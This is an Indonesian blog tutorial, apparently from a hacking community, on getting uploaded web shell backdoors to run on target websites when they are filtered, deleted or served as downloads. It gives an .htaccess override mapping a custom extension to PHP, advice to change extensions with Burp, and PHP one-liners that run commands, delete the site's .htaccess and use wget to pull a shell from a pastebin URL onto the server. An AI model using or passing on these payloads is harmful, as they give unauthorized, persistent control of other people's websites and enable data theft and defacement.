3 Tipe Bypass Shell Backdoor (Terdownload, Forbidden, Terhapus)

Cyberlone Indonesia
Cyberlone Indonesia
Minggu, 03 September 2023

Shell backdoor adalah sebuah program atau skrip yang secara diam-diam memberikan akses ilegal ke sistem komputer atau server tanpa sepengetahuan atau izin pemilik sistem. Backdoor ini dinamakan "shell" karena biasanya memberikan akses ke shell komputer, yang merupakan antarmuka baris perintah untuk mengendalikan sistem.

Tujuan utama dari shell backdoor adalah untuk memberikan akses dan kontrol penuh ke sistem target kepada penyerang atau pihak yang tidak sah. Dengan akses tersebut, penyerang dapat melakukan berbagai macam tindakan berbahaya, seperti mencuri data sensitif, merusak sistem, atau bahkan menggunakannya sebagai platform untuk serangan yang lebih luas.

 Biasanya shell backdoor dibuat dengan format php atau asp, namun tidak menutup kemungkinan shell backdoor memiliki extensi yang lain. Shell backdoor sendiri punya beberapa fungsi, yaitu:

  • Mendapatkan akses lebih terhadap website
  • Sebagai jalur belakang hacker untuk masuk kembali (tanpa exploitasi ulang)
  • Meracuni website dengan code jahat agar terjadi kerusakan pada website

Dalam beberapa kasus saat kita ingin mengakses shell backdoor pada target, shell yang kita upload sering kali terdownload, kita mempunyai beberapa teknik untuk bypass kasus ini 

Mengatasi Shell Backdoor Yang Forbidden dan Terhapus

Ada beberapa penyebab shell backdoor forbidden atau terhapus, salah satunya adalah penggunaan filter dimana melakukan block pada script tertentu. Kasus ini dapat diatasi dengan menggunakan shell tmp atau marijuana. untuk source codenya seperti berikut

Tmp Shell Backdoor


  • Kalian bisa ubah url shell indoxploit dengan url shell kalian (dalam bentuk txt)


Marijuana Shell Backdoor



Mengatasi Shell Backdoor Yang Terdownload

Selain Forbidden ada juga kasus shell yang terdownload saat diakses hal ini seringkali disebabkan oleh .htaccess namun ada juga yang memang tidak bisa dibypass seperti kasus dimana file terupload di aws ataupun didownload dengan script php. Berikut teknik teknik untuk bypass shell backdoor yang terdownload

 Bypass Shell Backdoor Dengan Override .htaccess


  • Buat file dengan nama .htaccess dengan isi sebagai berikut

AddType application/x-httpd-php .cyberlone

  • Upload ke server target, jika tidak bisa terupload coba gunakan burp dan ganti ektensi
  • Siapkan Shell Marijuana dan rename menjadi Marijuana.nakanosec
  • Upload Shell Marijuana.Cyberlone kemudian coba akses

 Bypass Shell Backdoor Dengan One Line Shell

  • Buat file cyberlone.php
  • Isi cyberlone.php dengan payload dibawah
<?php
system("id")
?>
  • Upload ke server target
  • Shell akan terdownload tapi command akan tereksekusi
  • Untuk upload shell remove dulu .htaccess dengan payload berikut 
<?php
system("rm .htaccess")
?>
    • kemudian untuk uploadnya gunakan payload berikut
    <?php
    system("wget https://pastebin.com/raw/7ZLbRc3s -O cyberlone.php")
    ?> 

    Dan lihat hasilnya bummm,, Begitulah sekian terimagajih... 


    edit Tags: Informasi, PENTES
    LihatTutupComment